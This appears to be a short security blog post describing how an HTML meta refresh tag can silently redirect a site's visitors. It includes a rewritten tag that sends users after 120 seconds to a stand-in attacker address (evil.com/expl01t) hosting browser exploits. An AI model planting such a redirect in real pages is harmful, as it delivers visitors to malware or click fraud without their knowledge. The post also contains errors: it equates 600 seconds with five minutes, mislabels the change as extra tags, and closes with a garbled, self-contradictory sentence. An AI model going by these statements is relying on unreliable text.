Refresh Meta Tag Attack

In many situations, using the refresh meta tag is the easiest method for redirecting users. Following is a simple tag that shows what administrators typically do to refresh the data on their website. Most news companies use this way to ensure visitors who are on their website for an extended period of time see updated content. After a limited period of time, the browser refreshes and the lately added content appears.

Check the following basic HTML tag; you can see it has been set to refresh after a count of 600 seconds or 5 minutes.
<meta http-equiv=”refresh” content=”600″>

Now if you use this same HTML line with an added push, you can redirect a visitor to another website without generating a pop-up. Without raising doubts, the attacker can
easily forward a visitor to an evil website after the visitor has viewed the intended website. Simply rewrite the refresh tag like this:

<meta http-equiv=”refresh” content=”120;url=http://evil.com/expl01t”>

The only variation in the refresh tag is a few extra HTML tags. Now every time a user browses to that website, after a few times, he or she is redirected to a website that is loaded with client-side browser-based attacks and/or pay-per-clicks. If used too quickly, this feature can lead to visitors quickly recognizing that the website is legitimate and not an evil site running malware in the background before visitors can press their browsers’ Back button.

Related posts

How to Improve Your Cyber Resilience by Strengthening User Privileges

The Dark Side of Viral Content: How Negative Reviews Can Snowball

Testing Gaming Monetization: Walking the Line Between Profit and Player Experience